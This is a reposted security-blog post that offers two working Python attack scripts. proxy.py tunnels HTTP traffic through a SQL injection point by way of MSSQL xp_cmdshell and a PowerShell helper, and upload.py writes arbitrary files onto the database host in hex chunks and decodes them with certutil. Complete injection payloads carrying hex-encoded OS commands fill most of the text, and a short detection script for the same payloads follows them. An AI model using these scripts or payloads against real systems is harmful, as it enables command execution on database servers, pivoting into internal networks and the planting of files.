A script that uses MSSQL's xp_cmdshell feature to proxy traffic, for SQL injection cases where the web and database servers are separated and the database host has no outbound network access

admin, 2024-01-09 11:38:54


1 Tool introduction

A script that uses MSSQL's xp_cmdshell feature to proxy traffic. It is intended for SQL injection cases where the web server and the database server are separate machines and the database host cannot reach the internet.

2 Other notes


1. upload.py conveniently uploads files through the SQL injection point.

2. proxy.py does the actual proxying, but before using it remember to change the injection method inside the exec_xp_cmdshell function and adapt it to your own injection point.

3 TODO

  •  Support HTTPS proxying
  •  Support SOCKS proxying


4 Scripts

proxy.py

import base64
import binascii
import re

import requests
from flask import Flask, request, make_response

# Markers wrapped around each row of command output so it can be cut out of the page
regex = 'MSSQL Proxy(.+?)MSSQL Proxy'
# Path of the PowerShell helper script on the database host (uploaded with upload.py)
script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"
app = Flask(__name__)


def exec_xp_cmdshell(cmd):
    # Adjust the URL, parameter and statement shape to your own injection point
    url = 'http://10.37.129.4/sql.php'
    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
        cmd.encode()).decode()
    # Clear the output table, run the command, then read the output back with a UNION query
    requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"})
    requests.post(url, data={"id": payload})
    res = requests.post(url, data={
        "id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN"
    })
    return ''.join(re.findall(regex, res.text))


def send_package(ip, port, data):
    # Hand the base64-encoded raw HTTP request to the PowerShell helper on the database host
    cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format(
        script_path=script_path, ip=ip, port=port, data=data
    )
    print(cmd)
    return exec_xp_cmdshell(cmd)


def clean_up_response(response):
    # The helper returns the raw HTTP response hex-encoded; rebuild it as a Flask response
    response = binascii.unhexlify(response.strip().encode()).decode()
    headers = response.split('\r\n\r\n')[0]
    body = '\r\n\r\n'.join(response.split('\r\n\r\n')[1:]).strip()
    res = make_response(body)
    res.status = ' '.join(headers.split('\r\n')[0].split(' ')[1:])
    for header in headers.split('\r\n')[1:]:
        res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:])
    return res


@app.before_request
def before_request():
    if request.method == 'CONNECT':
        return
    # Serialise the incoming request back into a raw HTTP/1.x message
    package = '{method} {path} {version}\r\n'.format(
        method=request.method,
        path=request.full_path,
        version=request.environ['SERVER_PROTOCOL']
    ).encode()
    host = ''
    for k, v in dict(request.headers).items():
        if k.upper() == 'Connection'.upper():
            package += b'Connection: close\r\n'
            continue
        if k.upper() == 'HOST':
            host = v
        package += '{k}: {v}\r\n'.format(k=k, v=v).encode()
    package += b'\r\n'
    package += request.stream.read()
    # print(package)
    if not host:
        return "HostNotFound\r--MSSQL Proxy"
    if len(host.split(':')) > 1:
        ip, port = host.split(':')
    else:
        ip, port = host, 80
    response = send_package(ip, port, base64.b64encode(package).decode())
    if response.strip() == 'FAILED':
        return "Failed\r--MSSQL Proxy", 902
    return clean_up_response(response)


if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=4000)

upload.py

import binascii
import sys

import requests


def exec_xp_cmdshell(cmd):
    # Adjust the URL, parameter and statement shape to your own injection point
    url = 'http://10.37.129.4/sql.php'
    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
        cmd.encode()).decode()
    requests.post(url, data={"id": payload})


def main():
    if len(sys.argv) < 3:
        print("Usage: python3 upload.py local_file_to_read remote_path_to_save")
        sys.exit(1)
    # Append one hex-encoded chunk at a time, then let certutil decode the whole file
    cmd = '''>>"{path}" set /p="{content}"<nul'''
    file = open(sys.argv[1], 'rb')
    path_to_save = sys.argv[2]
    exec_xp_cmdshell('cd . > "{}"'.format(path_to_save + '.tmp'))
    while 1:
        content = file.read(512)
        payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode())
        exec_xp_cmdshell(payload)
        if len(content) < 512:
            break
    exec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save))
    exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp'))
    print('Uploaded successfully!')


if __name__ == '__main__':
    main()
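Both scripts share one signature on the wire: the OS command is hidden in a hex literal assigned to a T-SQL variable that is then handed to xp_cmdshell. The detection below is an added defender-side example, not code from the original post; it runs over constructed request bodies (as a WAF or application log might record them), pulls out that hex literal, decodes it and checks the recovered command for the strings the two scripts use.

```python
import re

# Constructed sample request bodies: the first two copy the injection shape of
# proxy.py and upload.py above, the third is a benign request.
SAMPLE_REQUESTS = [
    "id=1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x"
    + "powershell C:/Temp/mssql_proxy.ps1 -remoteHost 10.0.0.5 -port 80 -sendData R0VUIC8=".encode().hex()
    + ";INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN",
    "id=1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x"
    + 'certUtil -decodehex "C:\\x.tmp" "C:\\x.exe"'.encode().hex()
    + ";EXEC master..xp_cmdshell @bjxl-- ZKN",
    "id=42",
]

# Match the variable, its hex literal and the later EXEC of that same variable together,
# so a plain "0x..." constant elsewhere in a query does not trigger on its own.
HEX_XP_CMDSHELL = re.compile(
    r"SET\s+(@\w+)\s*=\s*0x([0-9A-Fa-f]+).*?EXEC\s+master\.\.xp_cmdshell\s+\1",
    re.IGNORECASE | re.DOTALL,
)

# Fragments of the decoded command that are specific to the two scripts' behaviour.
SUSPICIOUS = ("powershell", "-sendData", "-decodehex", "set /p=")


def decode_hex_command(body):
    """Return the OS command hidden in a hex-encoded xp_cmdshell payload, or None."""
    m = HEX_XP_CMDSHELL.search(body)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(2)).decode("utf-8", errors="replace")
    except ValueError:
        return None


def scan_requests(bodies):
    """Return (index, decoded command, matched indicators) for each body that carries a payload."""
    findings = []
    for i, body in enumerate(bodies):
        cmd = decode_hex_command(body)
        if cmd is None:
            continue
        hits = [s for s in SUSPICIOUS if s.lower() in cmd.lower()]
        findings.append((i, cmd, hits))
    return findings
```

Any finding is worth an alert on its own, since xp_cmdshell is never needed by the web application; the indicator list only tells the responder which of the two scripts is in play.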


Originally published on the WeChat public account (李白你好): A script that uses MSSQL's xp_cmdshell feature to proxy traffic, for SQL injection cases where the web and database servers are separated and the database host has no outbound network access

Reposted by CN-SEC中文网 (please keep this link when reproducing): http://cn-sec.com/archives/2377187.html